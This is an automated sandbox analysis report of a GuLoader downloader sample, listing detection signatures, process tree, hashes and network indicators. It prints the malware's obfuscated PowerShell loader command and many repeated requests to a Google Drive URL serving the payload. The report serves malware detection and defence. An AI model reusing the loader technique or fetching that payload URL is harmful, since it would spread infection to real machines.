Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
yMXFgPOdf2.exe

Overview

General Information

Sample name:yMXFgPOdf2.exe
renamed because original name is a hash value
Original sample name:c3463021d3069ae7aad460707a950eb7b427a65c87f3d8e201b59cebb886a1b7.exe
Analysis ID:1588705
MD5:54327a2f6c75bb2c549a5a98a462a588
SHA1:f65473fa075bef32b55445d84cb8bfa4da48ac79
SHA256:c3463021d3069ae7aad460707a950eb7b427a65c87f3d8e201b59cebb886a1b7
Tags:exeuser-adrian__luca
Infos:

Detection

GuLoader
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • yMXFgPOdf2.exe (PID: 6592 cmdline: "C:\Users\user\Desktop\yMXFgPOdf2.exe" MD5: 54327A2F6C75BB2C549A5A98A462A588)
    • powershell.exe (PID: 6332 cmdline: "powershell.exe" -windowstyle minimized "$overstemme=Get-Content -Raw 'C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Touchlvr.Pap';$Epicerebral=$overstemme.SubString(72415,3);.$Epicerebral($overstemme)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 7536 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
00000002.00000002.1837590498.000000000A812000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000007.00000002.2599692281.0000000004F02000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      System Summary

      barindex
      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 142.250.184.238, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7536, Protocol: tcp, SourceIp: 192.168.2.11, SourceIsIpv6: false, SourcePort: 49980
      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6332, TargetFilename: C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Tilmeldingsprocedurens\yMXFgPOdf2.exe
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized "$overstemme=Get-Content -Raw 'C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Touchlvr.Pap';$Epicerebral=$overstemme.SubString(72415,3);.$Epicerebral($overstemme)" , CommandLine: "powershell.exe" -windowstyle minimized "$overstemme=Get-Content -Raw 'C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Touchlvr.Pap';$Epicerebral=$overstemme.SubString(72415,3);.$Epicerebral($overstemme)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\yMXFgPOdf2.exe", ParentImage: C:\Users\user\Desktop\yMXFgPOdf2.exe, ParentProcessId: 6592, ParentProcessName: yMXFgPOdf2.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$overstemme=Get-Content -Raw 'C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Touchlvr.Pap';$Epicerebral=$overstemme.SubString(72415,3);.$Epicerebral($overstemme)" , ProcessId: 6332, ProcessName: powershell.exe
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-01-11T04:27:01.146554+010028032702Potentially Bad Traffic192.168.2.1149980142.250.184.238443TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Tilmeldingsprocedurens\yMXFgPOdf2.exeReversingLabs: Detection: 73%
      Source: yMXFgPOdf2.exeReversingLabs: Detection: 73%
      Source: yMXFgPOdf2.exeVirustotal: Detection: 66%Perma Link
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.0% probability
      Source: yMXFgPOdf2.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.11:49980 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.2.11:49981 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.11:49982 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.11:49984 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.11:49986 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.11:49988 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.11:49990 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.11:49992 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.11:49994 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.11:49997 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.11:50001 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.11:50009 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.11:50011 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.11:50031 version: TLS 1.2
      Source: Binary string: stem.Core.pdb source: powershell.exe, 00000002.00000002.1836180120.00000000088FD000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeCode function: 0_2_00405629 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405629
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeCode function: 0_2_004060E4 FindFirstFileW,FindClose,0_2_004060E4
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeCode function: 0_2_0040276E FindFirstFileW,0_2_0040276E
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\TemplatesJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Users\user\Desktop\yMXFgPOdf2.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.11:49980 -> 142.250.184.238:443
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /download?id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=16tcQO7xT-tc8NDMtUgUWzj1OH4dV11wJ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=sk9M9FuG5hPT6XWck-rqP-8NhtaxUf16NsuEAstRXc9rF4M2gbBI5I5LWmJUwt7_EpFJLckH6oeuMFazHhZiZjHo1mQz0xRESfViuyhOcKepPUxajl8VknVSXSB1Uxlu5kWJaswg-lhzxHygTj-r4SkwoGFpw3D3YUYE58-h87bPFIga9sgYQ1g
